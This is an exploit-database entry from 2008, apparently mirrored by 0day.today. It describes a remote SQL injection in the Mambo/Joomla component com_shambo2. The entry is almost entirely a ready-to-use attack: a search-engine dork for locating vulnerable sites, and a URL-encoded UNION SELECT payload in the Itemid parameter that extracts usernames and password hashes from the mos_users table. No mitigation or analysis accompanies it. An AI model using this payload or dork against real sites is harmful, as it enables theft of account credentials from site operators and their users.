Mambo Component Shambo2 (Itemid) Remote SQL Injection Vulnerability

2008-02-04T00:00:00
ID 1337DAY-ID-2598
Type zdt
Reporter [email protected]
Modified 2008-02-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Mambo Component Shambo2 (Itemid) Remote SQL Injection Vulnerability
===================================================================



#########################################################################
#
# joomla SQL Injection(com_shambo2)
#
#
#########################################################################
#
# DORKS 1 : allinurl :"com_shambo2"
#
##########################################################################
EXPLOIT :

index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users






#  0day.today [2018-01-02]  #